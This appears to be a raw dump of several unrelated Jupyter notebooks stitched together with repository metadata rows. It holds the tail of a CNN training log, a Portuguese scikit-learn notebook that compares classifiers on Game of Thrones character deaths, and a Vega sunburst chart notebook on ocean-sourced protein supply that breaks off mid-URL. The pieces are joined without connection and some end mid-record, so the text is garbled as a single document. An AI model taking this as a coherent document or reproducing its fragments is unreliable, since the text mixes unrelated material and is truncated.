train acc: 0.532655; val_acc: 0.430000\n(Epoch 6 / 50) train acc: 0.586090; val_acc: 0.550000\n(Iteration 151 / 1150) loss: 1.019976\n(Epoch 7 / 50) train acc: 0.614504; val_acc: 0.460000\n(Epoch 8 / 50) train acc: 0.651399; val_acc: 0.530000\n(Iteration 201 / 1150) loss: 0.859481\n(Epoch 9 / 50) train acc: 0.666667; val_acc: 0.530000\n(Epoch 10 / 50) train acc: 0.680662; val_acc: 0.520000\n(Iteration 251 / 1150) loss: 0.881359\n(Epoch 11 / 50) train acc: 0.689143; val_acc: 0.600000\n(Epoch 12 / 50) train acc: 0.708227; val_acc: 0.590000\n(Epoch 13 / 50) train acc: 0.728584; val_acc: 0.600000\n(Iteration 301 / 1150) loss: 0.624405\n(Epoch 14 / 50) train acc: 0.739610; val_acc: 0.640000\n(Epoch 15 / 50) train acc: 0.747243; val_acc: 0.570000\n(Iteration 351 / 1150) loss: 0.576162\n(Epoch 16 / 50) train acc: 0.751908; val_acc: 0.590000\n(Epoch 17 / 50) train acc: 0.765903; val_acc: 0.640000\n(Iteration 401 / 1150) loss: 0.619740\n(Epoch 18 / 50) train acc: 0.768872; val_acc: 0.630000\n(Epoch 19 / 50) train acc: 0.759966; val_acc: 0.590000\n(Iteration 451 / 1150) loss: 0.525725\n(Epoch 20 / 50) train acc: 0.789652; val_acc: 0.660000\n(Epoch 21 / 50) train acc: 0.785835; val_acc: 0.660000\n(Iteration 501 / 1150) loss: 0.637972\n(Epoch 22 / 50) train acc: 0.790076; val_acc: 0.590000\n(Epoch 23 / 50) train acc: 0.810008; val_acc: 0.640000\n(Iteration 551 / 1150) loss: 0.479225\n(Epoch 24 / 50) train acc: 0.818066; val_acc: 0.620000\n(Epoch 25 / 50) train acc: 0.806192; val_acc: 0.580000\n(Epoch 26 / 50) train acc: 0.810433; val_acc: 0.640000\n(Iteration 601 / 1150) loss: 0.563112\n(Epoch 27 / 50) train acc: 0.818914; val_acc: 0.630000\n(Epoch 28 / 50) train acc: 0.822307; val_acc: 0.530000\n(Iteration 651 / 1150) loss: 0.470543\n(Epoch 29 / 50) train acc: 0.836726; val_acc: 0.610000\n(Epoch 30 / 50) train acc: 0.834182; val_acc: 0.670000\n(Iteration 701 / 1150) loss: 0.442307\n(Epoch 31 / 50) train acc: 0.847328; val_acc: 0.650000\n(Epoch 32 / 50) train acc: 0.839271; val_acc: 0.590000\n(Iteration 751 / 1150) loss: 0.427328\n(Epoch 33 / 50) train acc: 0.861323; val_acc: 0.640000\n(Epoch 34 / 50) train acc: 0.853690; val_acc: 0.650000\n(Iteration 801 / 1150) loss: 0.432014\n(Epoch 35 / 50) train acc: 0.861323; val_acc: 0.640000\n(Epoch 36 / 50) train acc: 0.858355; val_acc: 0.620000\n(Iteration 851 / 1150) loss: 0.336873\n(Epoch 37 / 50) train acc: 0.857930; val_acc: 0.690000\n(Epoch 38 / 50) train acc: 0.870653; val_acc: 0.630000\n(Epoch 39 / 50) train acc: 0.880407; val_acc: 0.660000\n(Iteration 901 / 1150) loss: 0.437571\n(Epoch 40 / 50) train acc: 0.871077; val_acc: 0.660000\n(Epoch 41 / 50) train acc: 0.863020; val_acc: 0.710000\n(Iteration 951 / 1150) loss: 0.299970\n(Epoch 42 / 50) train acc: 0.879559; val_acc: 0.590000\n(Epoch 43 / 50) train acc: 0.879135; val_acc: 0.650000\n(Iteration 1001 / 1150) loss: 0.340088\n(Epoch 44 / 50) train acc: 0.887193; val_acc: 0.580000\n(Epoch 45 / 50) train acc: 0.879983; val_acc: 0.590000\n(Iteration 1051 / 1150) loss: 0.373949\n(Epoch 46 / 50) train acc: 0.888041; val_acc: 0.630000\n(Epoch 47 / 50) train acc: 0.899915; val_acc: 0.640000\n(Iteration 1101 / 1150) loss: 0.329998\n(Epoch 48 / 50) train acc: 0.888465; val_acc: 0.610000\n(Epoch 49 / 50) train acc: 0.893554; val_acc: 0.570000\n(Epoch 50 / 50) train acc: 0.889313; val_acc: 0.590000\nAccuracy on the validation set: 0.71\nparameters of the best model:\n{'filter_num': 20, 'filter_size': 12, 'pool_size': 4, 'batch_size': 100, 'lr': 0.0005}\n" ], [ "# Plot the loss function and train / validation 
accuracies of the best model\nplt.subplot(2,1,1)\nplt.plot(best_solver.loss_history)\nplt.title('Training loss history')\nplt.xlabel('Iteration')\nplt.ylabel('Training loss')\n\nplt.subplot(2,1,2)\nplt.plot(best_solver.train_acc_history, '-o', label='train accuracy')\nplt.plot(best_solver.val_acc_history, '-o', label='validation accuracy')\nplt.xlabel('Iteration')\nplt.ylabel('Accuracies')\nplt.legend(loc='upper center', ncol=4)\n\nplt.gcf().set_size_inches(10, 10)\nplt.show()\n\nprint('Accuracy on the validation set: ', best_val_acc)\nprint('parameters of the best model:')\nprint(best_params)", "_____no_output_____" ], [ "# test set\ny_test_pred = model(X_test)\n \n_, y_pred = torch.max(y_test_pred,1)\ntest_accu = np.mean(y_pred.data.numpy() == y_test.data.numpy())\nprint('Test accuracy', test_accu, '\\n') ", "Test accuracy 0.6 \n\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e8dba60bbdbcc1ef47acb9bd11b77c1547580
564
ipynb
Jupyter Notebook
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
1
2021-06-25T06:16:50.000Z
2021-06-25T06:16:50.000Z
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
6
2020-09-04T07:32:29.000Z
2021-07-08T11:04:02.000Z
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
null
null
null
17.090909
35
0.530142
[]
[]
[]
cb1e9d85c96efd8ca8c324a74f1f24f138ec061f
288,396
ipynb
Jupyter Notebook
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
288,396
288,396
0.865258
[ [ [ "from sklearn import datasets #sklearn é uma das lib mais utilizadas em ML, ela contém, além dos \n #datasets, várias outras funções úteis para a análise de dados\n # essa lib será sua amiga durante toda sua carreira\nimport pandas as pd # importa a lib Pandas. Essa lib é utilizada para lidar com dataframes (TABELAS) \n #de forma mais amigável. \nfrom sklearn.model_selection import train_test_split,KFold,cross_val_score, cross_val_predict # esse método é utilizado para dividir o \n # conjunto de dados em grupos de treinamento e test\nfrom sklearn.svm import SVC #importa o algoritmo svm para ser utilizado \nfrom sklearn import tree # importa o algoritmo arvore de decisão\nfrom sklearn.linear_model import LogisticRegression #importa o algoritmo de regressão logística\nfrom sklearn.metrics import mean_absolute_error #utilizada para o calculo do MAE\nfrom sklearn.metrics import mean_squared_error #utilizada para o calculo do MSE\nfrom sklearn.metrics import r2_score #utilizada para o calculo do R2\nfrom sklearn import metrics #utilizada para as métricas de comparação entre os métodos\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier \nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\n", "/usr/local/lib/python3.6/dist-packages/statsmodels/tools/_testing.py:19: FutureWarning: pandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.\n import pandas.util.testing as tm\n" ], [ "from google.colab import drive\ndrive.mount('/content/drive')", "Mounted at /content/drive\n" ], [ "got_dataset=pd.read_csv('/content/drive/My Drive/Colab Notebooks/IGTI/app_comparacao_modelo_cap_4/character-predictions.csv') \n##../input/game-of-thrones/character-predictions.csv') #realiza a leitura do dataset", "_____no_output_____" ], [ "got_dataset.info() #conhecendo o dataset", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 1946 entries, 0 to 1945\nData columns (total 33 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 S.No 1946 non-null int64 \n 1 actual 1946 non-null int64 \n 2 pred 1946 non-null int64 \n 3 alive 1946 non-null float64\n 4 plod 1946 non-null float64\n 5 name 1946 non-null object \n 6 title 938 non-null object \n 7 male 1946 non-null int64 \n 8 culture 677 non-null object \n 9 dateOfBirth 433 non-null float64\n 10 DateoFdeath 444 non-null float64\n 11 mother 21 non-null object \n 12 father 26 non-null object \n 13 heir 23 non-null object \n 14 house 1519 non-null object \n 15 spouse 276 non-null object \n 16 book1 1946 non-null int64 \n 17 book2 1946 non-null int64 \n 18 book3 1946 non-null int64 \n 19 book4 1946 non-null int64 \n 20 book5 1946 non-null int64 \n 21 isAliveMother 21 non-null float64\n 22 isAliveFather 26 non-null float64\n 23 isAliveHeir 23 non-null float64\n 24 isAliveSpouse 276 non-null float64\n 25 isMarried 1946 non-null int64 \n 26 isNoble 1946 non-null int64 \n 27 age 433 non-null float64\n 28 numDeadRelations 1946 non-null int64 \n 29 boolDeadRelations 1946 non-null int64 \n 30 isPopular 1946 non-null int64 \n 31 popularity 1946 non-null float64\n 32 isAlive 1946 non-null int64 \ndtypes: float64(10), int64(15), object(8)\nmemory usage: 501.8+ KB\n" ], [ "got_dataset.head() #mostrando o dataset", "_____no_output_____" ], [ "nans = got_dataset.isna().sum() #contando a quantidade de valores nulos\nprint(nans[nans > 
0])\nprint(\"-------\")\nprint(nans)", "title 1008\nculture 1269\ndateOfBirth 1513\nDateoFdeath 1502\nmother 1925\nfather 1920\nheir 1923\nhouse 427\nspouse 1670\nisAliveMother 1925\nisAliveFather 1920\nisAliveHeir 1923\nisAliveSpouse 1670\nage 1513\ndtype: int64\n-------\nS.No 0\nactual 0\npred 0\nalive 0\nplod 0\nname 0\ntitle 1008\nmale 0\nculture 1269\ndateOfBirth 1513\nDateoFdeath 1502\nmother 1925\nfather 1920\nheir 1923\nhouse 427\nspouse 1670\nbook1 0\nbook2 0\nbook3 0\nbook4 0\nbook5 0\nisAliveMother 1925\nisAliveFather 1920\nisAliveHeir 1923\nisAliveSpouse 1670\nisMarried 0\nisNoble 0\nage 1513\nnumDeadRelations 0\nboolDeadRelations 0\nisPopular 0\npopularity 0\nisAlive 0\ndtype: int64\n" ], [ "#Tamanho do dataset\nlen(got_dataset)", "_____no_output_____" ], [ "got_dataset.describe()", "_____no_output_____" ], [ "# analisando os dados nulos\nprint(got_dataset[\"age\"].mean()) #possível erro no nosso dataset (média negativa para a idade?)", "-1293.5635103926097\n" ], [ "# realizando uma maior análise do dataset\nprint(got_dataset[\"name\"][got_dataset[\"age\"] < 0])\nprint(\"---\")\nprint(got_dataset['age'][got_dataset['age'] < 0])", "Series([], Name: name, dtype: object)\n---\nSeries([], Name: age, dtype: float64)\n" ], [ "#substituindo os valores negativos\ngot_dataset.loc[1684, \"age\"] = 25.0\ngot_dataset.loc[1868, \"age\"] = 0.0", "_____no_output_____" ], [ "print(got_dataset[\"age\"].mean()) #verificando, novamente, a idade", "36.70438799076271\n" ], [ "#trabalhando com dados nulos\ngot_dataset[\"age\"].fillna(got_dataset[\"age\"].mean(), inplace=True) #substituindo os valores nulos pela média da coluna\ngot_dataset[\"culture\"].fillna(\"\", inplace=True) #preenchendo os valores nulos da coluna cultura com uma string nula\n\n# preenchendo os demais valores com -1\ngot_dataset.fillna(value=-1, inplace=True)", "_____no_output_____" ], [ "#realizando o boxplot \ngot_dataset.boxplot(['alive','popularity'])", "_____no_output_____" ], [ "#analisando a \"mortalidade\" dos personagens\nimport warnings\nwarnings.filterwarnings('ignore')\nf,ax=plt.subplots(2,2,figsize=(17,15))\nsns.violinplot(\"isPopular\", \"isNoble\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[0, 0])\nax[0, 0].set_title('Noble and Popular vs Mortality')\nax[0, 0].set_yticks(range(2))\n\nsns.violinplot(\"isPopular\", \"male\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[0, 1])\nax[0, 1].set_title('Male and Popular vs Mortality')\nax[0, 1].set_yticks(range(2))\n\nsns.violinplot(\"isPopular\", \"isMarried\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[1, 0])\nax[1, 0].set_title('Married and Popular vs Mortality')\nax[1, 0].set_yticks(range(2))\n\n\nsns.violinplot(\"isPopular\", \"book1\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[1, 1])\nax[1, 1].set_title('Book_1 and Popular vs Mortality')\nax[1, 1].set_yticks(range(2))\n\n\nplt.show()", "_____no_output_____" ], [ "# Retirando algumas colunas \ndrop = [\"S.No\", \"pred\", \"alive\", \"plod\", \"name\", \"isAlive\", \"DateoFdeath\"]\ngot_dataset.drop(drop, inplace=True, axis=1)\n\n#Salvando uma cópia do dataset para aplicar o hotencoder\ngot_dataset_2 = got_dataset.copy(deep=True)", "_____no_output_____" ], [ "# transformando os dados categóricos em one-hot-encoder\ngot_dataset = pd.get_dummies(got_dataset)", "_____no_output_____" ], [ "got_dataset.head(10)", "_____no_output_____" ], [ "got_dataset.shape", "_____no_output_____" ], [ "# Separando o dataset entre entradas e saídas\nx = got_dataset.iloc[:,1:].values\ny = 
got_dataset.iloc[:, 0].values\nprint(x.shape)\nprint(y.shape)", "(1946, 1011)\n(1946,)\n" ] ], [ [ "** Iniciando a contrução do pipeline do algoritmo **", "_____no_output_____" ] ], [ [ "# aplicando o modelo de validação cruzada\n# divide o dataset entre 5 diferentes grupos\nkfold = KFold(n_splits=5, shuffle=True, random_state=42)\nprint(kfold.get_n_splits())", "5\n" ], [ "# construindo os modelos de classificação\nmodelos = [LogisticRegression(solver='liblinear'), RandomForestClassifier(n_estimators=400, random_state=42), \n DecisionTreeClassifier(random_state=42), svm.SVC(kernel='rbf', gamma='scale', random_state=42), \n KNeighborsClassifier()]", "_____no_output_____" ], [ "#utilizando a validação cruzada\nmean=[]\nstd=[]\nfor model in modelos:\n result = cross_val_score(model, x, y, cv=kfold, scoring=\"accuracy\", n_jobs=-1)\n mean.append(result)\n std.append(result)", "_____no_output_____" ], [ "classificadores=['Regressão Logística', 'Random Forest', 'Árvore de Decisão', 'SVM', 'KNN']\n\nplt.figure(figsize=(12, 12))\nfor i in range(len(mean)):\n sns.distplot(mean[i], hist=False, kde_kws={\"shade\": True})\n \nplt.title(\"Distribuição de cada um dos classificadores\", fontsize=15)\nplt.legend(classificadores)\nplt.xlabel(\"Acurácia\", labelpad=20)\nplt.yticks([])\n\nplt.show()", "_____no_output_____" ] ], [ [ "**Realizando a previsão dos classificadores**", "_____no_output_____" ], [ "** Quais algoritmos escollher?**", "_____no_output_____" ] ], [ [ "# Dividindo o dataset entre treinamento 80% e teste 20%\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, stratify=y, \n shuffle=True, random_state=42)", "_____no_output_____" ], [ "#escolhendo o svm e a floresta randomica\nsvm_clf = svm.SVC(C=0.9, gamma=0.1, kernel='rbf', probability=True, random_state=42)\nrf_clf = RandomForestClassifier(n_estimators=400, n_jobs=-1, random_state=42)\n\n# Treina os modelos\nsvm_clf.fit(x_train, y_train)\nrf_clf.fit(x_train, y_train)", "_____no_output_____" ], [ "# obtém as probabilidades previstas\nsvm_prob = svm_clf.predict_proba(x_test)\nrf_prob = rf_clf.predict_proba(x_test)\n\n# Valores reais\nsvm_preds = np.argmax(svm_prob, axis=1)\nrf_preds = np.argmax(rf_prob, axis=1)", "_____no_output_____" ], [ "#analisando os modelos \ncm = metrics.confusion_matrix(y_test, svm_preds)\ncm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\ncm2 = metrics.confusion_matrix(y_test, rf_preds)\ncm2 = cm2.astype('float') / cm2.sum(axis=1)[: , np.newaxis]\n\nclasses = [\"Morto\", \"Vivo\"]\nf, ax = plt.subplots(1, 2, figsize=(15, 5))\nax[0].set_title(\"SVM\", fontsize=15.)\nsns.heatmap(pd.DataFrame(cm, index=classes, columns=classes), \n cmap='winter', annot=True, fmt='.2f', ax=ax[0]).set(xlabel=\"Previsao\", ylabel=\"Valor Real\")\n\nax[1].set_title(\"Random Forest\", fontsize=15.)\nsns.heatmap(pd.DataFrame(cm2, index=classes, columns=classes), \n cmap='winter', annot=True, fmt='.2f', ax=ax[1]).set(xlabel=\"Previsao\", \n ylabel=\"Valor Real\")", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ] ]
cb1ec0666cafaaccec5f977fc52092bb400f05f6
108,806
ipynb
Jupyter Notebook
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
134.162762
80,773
0.848657
[ [ [ "# Blue Food", "_____no_output_____" ], [ "Visualizing protein supply and how the practices generating that protein supply affect the ocean using a heirarchical relationship.\n\nNote that this is a parameterized widget; the specification passed to the API will not be renderable without the geostore identifier being inserted. ", "_____no_output_____" ], [ "*Author: Rachel Thoms\n<br>Created: 08 24 2021\n<br>Environment: jupyterlab*", "_____no_output_____" ], [ "## Style", "_____no_output_____" ], [ "- Vega chart\n- Chart type: [Sunburst](https://vega.github.io/vega/examples/sunburst/)\n- Value: Protein Supply (g/capita/day)", "_____no_output_____" ], [ "## Data", "_____no_output_____" ], [ "- Data: [ocn_calcs_015_blue_food_protein_supply](https://resourcewatch.carto.com/u/wri-rw/dataset/ocn_calcs_015_blue_food_protein_supply)\n- Resource Watch: [explore page](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)\n- Source: [FAO Food Balance Sheet](http://www.fao.org/faostat/en/#data/FBS)", "_____no_output_____" ], [ "## Preparation", "_____no_output_____" ], [ "### Vega", "_____no_output_____" ] ], [ [ "import json\nfrom vega import Vega\nfrom IPython.display import display", "_____no_output_____" ], [ "def Vega(spec):\n bundle = {}\n bundle['application/vnd.vega.v5+json'] = spec\n display(bundle, raw=True)", "_____no_output_____" ], [ "widget_width = 600\nwidget_height = 600", "_____no_output_____" ] ], [ [ "## Visualization", "_____no_output_____" ], [ "### Queries", "_____no_output_____" ], [ "#### Testing", "_____no_output_____" ], [ "``` gid_0 = 'JPN' ``` used as stand-in for parameterized ```geostore_id={{geostore_id}}``` in production version", "_____no_output_____" ], [ "```sql\nSELECT alias.iso as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product \nFROM \n (SELECT * FROM foo_061_rw1_blue_food_supply_edit) data \nINNER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nWHERE iso='JPN' \nORDER BY analysis_category ASC, id ASC\n```", "_____no_output_____" ], [ "#### Parameterization", "_____no_output_____" ], [ "```sql\nSELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product \nFROM \n (SELECT * FROM foo_061_rw1_blue_food_supply_edit) data \nLEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nLEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \nWHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' \nORDER BY analysis_category ASC, id ASC\n```", "_____no_output_____" ] ], [ [ "spec=json.loads(\"\"\"{\n \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n \"padding\": 5,\n \"autosize\": \"pad\",\n \"signals\": [\n {\n \"name\": \"year\",\n \"value\": 2018,\n \"bind\": {\"input\": \"range\", \"min\": 1961, \"max\": 2018, \"step\": 1}\n }\n ],\n \"data\": [\n {\n \"name\": \"table\",\n \"url\": \"https://wri-rw.carto.com/api/v2/sql?q= SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product FROM (SELECT * FROM ocn_calcs_015_blue_food_protein_supply) data LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' ORDER BY analysis_category ASC, id ASC, year DESC\",\n \"format\": {\"type\": \"json\", \"property\": \"rows\"},\n \"transform\": [\n {\"type\": \"filter\", \"expr\": \"datum.year==year\"},\n {\"type\": \"stratify\", 
\"key\": \"id\", \"parentKey\": \"parent\"},\n {\n \"type\": \"partition\",\n \"field\": \"size\",\n \"sort\": {\"field\": [\"analysis_category\"]},\n \"size\": [{\"signal\": \"2 * PI\"}, {\"signal\": \"width/4\"}],\n \"as\": [\"a0\", \"r0\", \"a1\", \"r1\", \"depth\", \"children\"],\n \"padding\": 0\n },\n {\"type\": \"formula\", \"expr\": \"split(datum.id,'_')[0]\", \"as\": \"label\"},\n {\"type\": \"formula\", \"expr\": \"datum.protein ? format((datum.protein), '.1f') + ' g/capita/day' : ''\", \"as\": \"protein\"}\n ]\n }\n ],\n \"scales\": [\n {\n \"name\": \"legend\",\n \"type\": \"ordinal\",\n \"domain\": [\"Total food supply\", \"Pressure-generating, land-sourced foods\",\"Ocean-sourced foods\", \"Other land-sourced foods\"],\n \"range\": [\"#f3b229\",\"#f5c93a\",\"#2670a5\",\"#e8d59a\"]\n },\n {\n \"name\": \"blues\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#2670a5\", \"#3d7fae\", \"#538fb7\", \"#699fc0\"],\n \"domainMin\": 1,\n \"reverse\": false\n },\n {\n \"name\": \"greys\",\n \"type\": \"ordinal\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#f2e2b2\", \"#f7e9be\", \"#fcf0ca\",\"#e8d59a\"]\n },\n {\n \"name\": \"oranges\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#f3b229\", \"#f4c141\", \"#f5c93a\", \"#f6d544\", \"#f6e04e\"],\n \"domainMin\": 1,\n \"reverse\": false\n\n },\n {\"name\": \"opacity\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"domainMin\": 1,\n \"reverse\": true,\n \"range\": [0.85,1]}\n ],\n \"marks\": [\n {\n \"type\": \"arc\",\n \"from\": {\"data\": \"table\"},\n \"encode\": {\n \"enter\": {\n \"x\": {\"signal\": \"width/3\"},\n \"y\": {\"signal\": \"height/2\"},\n \"zindex\": {\"value\": 1},\n \"opacity\": [{\"test\": \"test(/Secondary/, datum.product)\", \"value\": 0.5 },{\"value\": 1}],\n \"fill\": [\n {\n \"scale\": {\n \"signal\": \n \"(datum.analysis_category === 'Other Land-Sourced Foods' ? 'greys': datum.analysis_category === 'Ocean-Sourced Foods' ? 
'blues' : 'oranges')\"\n },\n \"field\": \"depth\"\n }\n ]\n },\n \"update\": {\n \"startAngle\": {\"field\": \"a0\"},\n \"endAngle\": {\"field\": \"a1\"},\n \"innerRadius\": {\"field\": \"r0\"},\n \"outerRadius\": {\"field\": \"r1\"},\n \"stroke\": {\"value\": \"white\"},\n \"strokeWidth\": {\"value\": 0.5},\n \"zindex\": {\"value\": 1}\n },\n \"hover\": {\n \"stroke\": {\"value\": \"red\"},\n \"strokeWidth\": {\"value\": 2},\n \"zindex\": {\"value\": 0}\n }\n }\n }\n ],\n \"legends\": [\n {\n \"title\": [\"Sources of Protein\"],\n \"orient\": \"none\",\n \"legendX\": {\"signal\" : \"width*.65\"},\n \"legendY\": {\"signal\" : \"height*.4\"},\n \"type\": \"symbol\",\n \"fill\": \"legend\",\n \"titleFontSize\": {\"signal\": \"width/40\"},\n \"titleFont\": \"Lato\",\n \"labelFontSize\": {\"signal\": \"width/50\"},\n \"labelFont\": \"Lato\",\n \"clipHeight\": 16,\n \"encode\": {\n \"labels\": {\n \"interactive\": true,\n \"enter\": {\n \"tooltip\": {\n \"signal\": \"datum.label\"\n }\n },\n \"update\": {\n \"fill\": {\"value\": \"grey\"}\n },\n \"hover\": {\n \"fill\": {\"value\": \"firebrick\"}\n }\n }\n }\n }\n ],\n \"interaction_config\": [\n {\n \"name\": \"tooltip\",\n \"config\": {\n \"fields\": [\n {\n \"column\": \"label\",\n \"property\": \"Commodity\",\n \"type\": \"text\",\n \"format\": \"\"\n },\n {\n \"column\": \"protein\",\n \"property\": \"Contribution to protein supply\",\n \"type\": \"text\",\n \"format\": \"\"\n }\n ]\n }\n }\n ]\n}\n\"\"\")", "_____no_output_____" ], [ "vega_view=dict(spec)\nvega_view['legends'][0]['labelFont'] = 'Arial'\nvega_view['legends'][0]['titleFont'] = 'Arial'\nvega_view['height'] = widget_height\nvega_view['width'] = widget_width\nvega_view['data'][0]['url']= vega_view['data'][0]['url'].replace('{{geostore_env}}','geostore_prod')\nvega_view['data'][0]['url'] = vega_view['data'][0]['url'].replace('{{geostore_id}}','f653d0a434168104f4bdcdf8c712d079')\nVega(vega_view)", "_____no_output_____" ] ], [ [ "[Open the Chart in the Vega 
Editor](https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATONABONHJnaT0AQXEACOAA8kCHABs4OtgDMdSHRBxIocALSWGJkzXFkdipLJokEx0TJABPNgZMHUs2RR0YGjg-RVgaKCCdWSRMKmkQAHcaWXo0AQAGcpl4GjIsNABmSpkHWQDvMpkkKLYIGgAvODQQVvy+snEgiDQAbVBJhCH0MLgkRXziIIYlgCZygEYADhkmL1k0UC8cKOG-byGZBC80fYBOADZ9x6R9ND2jmQQTBwHAvAC+YKk8yMSxAUEi4kwijCGy2sIAwgB5AAy+VO4nOqEu4mumGGEDgZigZJkbFU6mmqBmIAAQgAlTT5ACSABEAHL5LG4mQAUQAKgAJfIAWRFAA1uXyefkRQBlMWCiUCmQAcXZ+T52OVMjFAFU2flTarOTIAFIABQFAF0IU6ZNlcrNoYthrkmGZ8gxFCZhlhcPgiAVlM5FAVKBlFJg2PG2AgCEgcDQSDtOABHEwAflzAF4dKqRdiReixTZPEgIKwxDYIDpaLIAPpVLI5KhrVZSHQrNYDuiIZs6YoDhyKOCIgd9QYDzYmbbjnCKNjArwDpCTExhPoQdsZYFkOJhKcb2QMak6ABibMx0p0AApy5XqzoAFT3x-P2JsJ2nztrG+ztv62ztgBHYQAwOCmGE7ZwAEmAAJTdrkOhcnyfIimyOi2pi2EWAU7ZBIEfTeMeCJIkkLaaKqtYUTomJ8kx9aUOR9Y6KWHq9jOtiYmyPJ4ToLIAJo2HuB40EeJ7kOeOgMeiI6yEpqrovksSKMgZJEiAmBhDgsKiBI+TrnSySGbcbAFNMkIGXcEDaQgXoGUZsKWDQJjAusMgGOuwwegwCDUMUnY8aW8IMIiyIgJCoCGcZwxeT5yT5AF6zoMFoVDooxbFnl8VQu5yXoECfhqJYKIyAA1nAKLoMU5l9oiADSDXDNOs5kglpWwtOahqGZMheZShIgAuDyTXEemgGNJiEsyu5BDJck5ApcUuoCAxLHMk21Huww7N+Oj2lyxWgOMR3oEUJQwAQAAs8VuiA9azG95T5IoX1dPs33-e6IKlDIaSLTOkiva07RkGg5Rgi6r3QEEChuQssJmGQs7nDISWwnE7RBPksipkgzxMiAYqbpk0F2HBCH5PaM4QLBM7OFj4jJDkXhkAOoQEs4YhBk4anQdMMiYk4u6C5EqTITEbBsLI4sgJi9DJCEu6yDLwvy2LICvXcWMfQAxJYDRMDsOyvPkZsCFArwNCgMgmzs7wAOzlEgAi23AhyyAIrwoNt3qwhBqO4x5wyeJzazE6T5OgHxvpIP600LRN8iqDAxUgEbe0gK7Htez7LsNLI7uWEg00mwIDSHJYTDu7b7yvK8lhQF9r0k8gXjSuTXx53ApCKBSaBVyYFJ9ejwxkDOB75HjwwE14RPugnGhJz2Kdp1pSSLUFwM5w5+em5YOxwDslu25Y7twK8TA1x3ljlBkvv+4HwfTzCy-5yrS-oBjqsPycgN4XDkNvdAfoAyjX3pnI+udT4UzNhbK2NsXaWEelAfYj1AaF0sPbR2zt8HvADo9Z6GD3hwHKI9IY3cN79w0IPGcI8x6oAnlPEqM90B0kcHQGq-Vo5eGAfHXum8IGeiganGBIAM6H2zrnHuZNxCMJeDIFhyQ2FIm2Oo3cxsmTlEoIcAQUh9iI2+IoWqjJ9oALeqkLSG5XL6WTlI3eDlZzwnkOAnq6V9K-H0tdImt1ij0AIA0XOjUrqHSCRgOAtQsAEB2LnfoZwDDgOXNscEtIHBQH4W5YEQJfQKEwC+Agqo4DwgJGsMIBABw5UoBZa81JUKohXEsQxAg+oZKWPsBGsCPBuWRgGAJ0SQzoBfPUla+5DzHg2meZEkVSwAHI1bwHiNiLWzhVSyxFveRWyslk6ALDoJZc8GoQCWagDCIVOLSRmfJeZYRFknMlqscQWydnyzvPsi5RyTnh1+VcpZcQ9EK